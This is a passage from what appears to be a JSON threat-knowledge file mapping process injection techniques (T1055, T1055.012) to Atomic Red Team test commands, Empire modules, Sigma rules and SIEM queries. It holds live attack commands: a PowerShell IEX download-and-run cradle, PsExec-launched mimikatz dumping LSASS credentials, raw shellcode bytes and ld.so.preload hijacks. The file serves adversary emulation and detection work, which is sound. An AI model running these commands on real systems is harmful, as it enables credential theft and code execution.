-expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"Word\" -sub \"Exploit\"\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1055.012", + "display_name": "Process Injection: Process Hollowing", + "atomic_tests": [ + { + "name": "Process Hollowing using PowerShell", + "auto_generated_guid": "562427b4-39ef-4e8c-af88-463a78e70b9c", + "description": "This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.\nCredit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "hollow_binary_path": { + "description": "Path of the binary to hollow (executable that will run inside the sponsor)", + "type": "String", + "default": "C:\\Windows\\System32\\cmd.exe" + }, + "parent_process_name": { + "description": "Name of the parent process", + "type": "String", + "default": "explorer" + }, + "sponsor_binary_path": { + "description": "Path of the sponsor binary (executable that will host the binary)", + "type": "String", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "spawnto_process_name": { + "description": "Name of the process to spawn", + "type": "String", + "default": "notepad" + } + }, + "executor": { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "cleanup_command": "Stop-Process -Name \"#{spawnto_process_name}\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "RunPE via VBA", + "auto_generated_guid": "3ad4a037-1598-4136-837c-4027e4fa319b", + "description": "This module executes notepad.exe from within the WINWORD.EXE process\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ms_product": { + "description": "Maldoc application Word", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1055\\src\\x64\\T1055-macrocode.txt\" -officeProduct \"Word\" -sub \"Execute\"\n", + "#{psexec_path} /accepteula \\\\DC1 -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "#{psexec_path} /accepteula \\\\#{machine} -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "C:\\PSTools\\PsExec.exe /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3", + "powershell/code_execution/invoke_reflectivepeinjection", + "powershell/code_execution/invoke_shellcode", + "powershell/code_execution/invoke_shellcodemsil", + "powershell/credentials/credential_injection", + "powershell/management/psinject", + "powershell/management/reflective_inject", + "powershell/management/shinject", + "python/management/osx/shellcodeinject64", + "```", + "echo #{path_to_shared_library} > /etc/ld.so.preload", + "echo /home/$USER/random.so > /etc/ld.so.preload" + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1055\\src\\x64\\T1055-macrocode.txt\" -officeProduct \"Word\" -sub \"Execute\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "#{psexec_path} /accepteula \\\\DC1 -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "#{psexec_path} /accepteula \\\\#{machine} -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "C:\\PSTools\\PsExec.exe /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3", + "source": "data/abilities/defense-evasion/a42dfc86-12f0-4f06-b0cf-24830c7f61f4.yml", + "name": "Start a new calculator process" + }, + { + "command": "powershell/code_execution/invoke_reflectivepeinjection", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/code_execution/invoke_shellcode", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/code_execution/invoke_shellcodemsil", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/credential_injection", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/psinject", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/reflective_inject", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/shinject", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/osx/shellcodeinject64", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo #{path_to_shared_library} > /etc/ld.so.preload", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo /home/$USER/random.so > /etc/ld.so.preload", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1055", + "display_name": "Process Injection", + "atomic_tests": [ + { + "name": "Shellcode execution via VBA", + "auto_generated_guid": "1c91e740-1729-4329-b779-feba6e71d048", + "description": "This module injects shellcode into a newly created process and executes. By default the shellcode is created,\nwith Metasploit, for use on x86-64 Windows 10 machines.\n\nNote: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office\nis required.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The 64-bit version of Microsoft Office must be installed\n", + "prereq_command": "try {\n $wdApp = New-Object -COMObject \"Word.Application\"\n $path = $wdApp.Path\n Stop-Process -Name \"winword\"\n if ($path.contains(\"(x86)\")) { exit 1 } else { exit 0 }\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word (64-bit) manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1055\\src\\x64\\T1055-macrocode.txt\" -officeProduct \"Word\" -sub \"Execute\"\n", + "name": "powershell" + } + }, + { + "name": "Remote Process Injection in LSASS via mimikatz", + "auto_generated_guid": "3203ad24-168e-4bec-be36-f79b13ef8a83", + "description": "Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).\nEspecially useful against domain controllers in Active Directory environments.\nIt must be executed in the context of a user who is privileged on remote `machine`.\n\nThe effect of `/inject` is explained in \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "machine": { + "description": "machine to target (via psexec)", + "type": "String", + "default": "DC1" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "%tmp%\\mimikatz\\x64\\mimikatz.exe" + }, + "psexec_path": { + "description": "Path to PsExec", + "type": "String", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + }, + { + "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})\n", + "prereq_command": "if (Test-Path \"#{psexec_path}\") { exit 0} else { exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_path}\" -Force\n" + } + ], + "executor": { + "command": "#{psexec_path} /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "name": "command_prompt", + "elevation_required": false + } + } + ] + }, + { + "id": "a42dfc86-12f0-4f06-b0cf-24830c7f61f4", + "name": "Spawn calculator (shellcode)", + "description": "Start a new calculator process", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1055", + "name": "Process Injection" + }, + "platforms": { + "windows": { + "shellcode_amd64": { + "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3" + } + } + } + }, + { + "Empire Module": "powershell/code_execution/invoke_reflectivepeinjection", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_reflectivepeinjection\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/code_execution/invoke_shellcode", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_shellcode\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/code_execution/invoke_shellcodemsil", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_shellcodemsil\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/credentials/credential_injection", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/credentials/credential_injection\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/management/psinject", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/management/psinject\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/management/reflective_inject", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/management/reflective_inject\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/management/shinject", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/management/shinject\": [\"T1055\"]," + }, + { + "Empire Module": "python/management/osx/shellcodeinject64", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"python/management/osx/shellcodeinject64\": [\"T1055\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_command_line contains \"*Invoke-DllInjection*\"or process_command_line contains \"C:\\\\windows\\\\sysnative\\\\\"", + "name": "Process Injection Process" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit preload_lib", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /etc/ld.so.preload -p wa -k preload_lib", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" ld.so.preload | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "references": [ + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "status": "experimental", + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "date": "2018/11/30", + "modified": "2019/11/08", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "TargetProcessAddress|endswith": [ + "0B80", + "0C7C", + "0C88" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "status": "experimental", + "description": "Detects the creation of a named pipe used by known APT malware", + "references": [ + "Various sources" + ], + "date": "2017/11/06", + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Note that you have to configure logging for PipeEvents in Symson config" + }, + "detection": { + "selection": { + "EventID": [ + 17, + 18 + ], + "PipeName": [ + "\\isapi_http", + "\\isapi_dg", + "\\isapi_dg2", + "\\sdlrpc", + "\\ahexec", + "\\winsession", + "\\lsassw", + "\\46a676ab7f179e511e30dd2dc41bd388", + "\\9f81f59bc58452127884ce513865ed20", + "\\e710f28d59aa529d6792ca6ff0ca1b34", + "\\rpchlp_3", + "\\NamePipe_MoreWindows", + "\\pcheap_reuse", + "\\msagent_*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "falsepositives": [ + "Unkown" + ], + "level": "critical" + }, + { + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "status": "experimental", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "references": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "author": "John Lambert (tech), Florian Roth (rule)", + "date": "2017/03/04", + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Use the following config to generate the necessary Event ID 10 Process Access events: VBE7.DLLUNKNOWN" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "*\\verclsid.exe", + "GrantedAccess": "0x1FFFFF" + }, + "combination1": { + "CallTrace": "*|UNKNOWN(*VBE7.DLL*" + }, + "combination2": { + "SourceImage": "*\\Microsoft Office\\\\*", + "CallTrace": "*|UNKNOWN*" + }, + "condition": "selection and 1 of combination*" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "status": "experimental", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html" + ], + "author": "Florian Roth", + "date": "2018/02/22", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\WINWORD.EXE", + "Image": "*\\FLTLDR.exe*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + ], + "level": "medium" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "status": "experimental", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd decribed in CVE-2019-1378", + "references": [ + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua" + ], + "author": "Florian Roth", + "date": "2019/11/15", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentCommandLine": [ + "*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\SetupComplete.cmd", + "*\\cmd.exe /c C:\\Windows\\Setup\\Scripts\\PartnerSetupComplete.cmd" + ] + }, + "filter": { + "Image": [ + "C:\\Windows\\System32\\\\*", + "C:\\Windows\\SysWOW64\\\\*", + "C:\\Windows\\WinSxS\\\\*", + "C:\\Windows\\Setup\\\\*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Dridex Process Pattern", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "experimental", + "description": "Detects typical Dridex process patterns", + "references": [ + "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3" + ], + "author": "Florian Roth", + "date": "2019/01/10", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*\\svchost.exe C:\\Users\\\\*\\Desktop\\\\*" + }, + "selection2": { + "ParentImage": "*\\svchost.exe*", + "CommandLine": [ + "*whoami.exe /all", + "*net.exe view" + ] + }, + "condition": "1 of them" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "DLL monitoring" + ], + [ + "Named Pipes" + ], + [ + "API monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon ID 17", + " 18", + "Named Pipes" + ], + [ + "API monitoring" + ], + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + 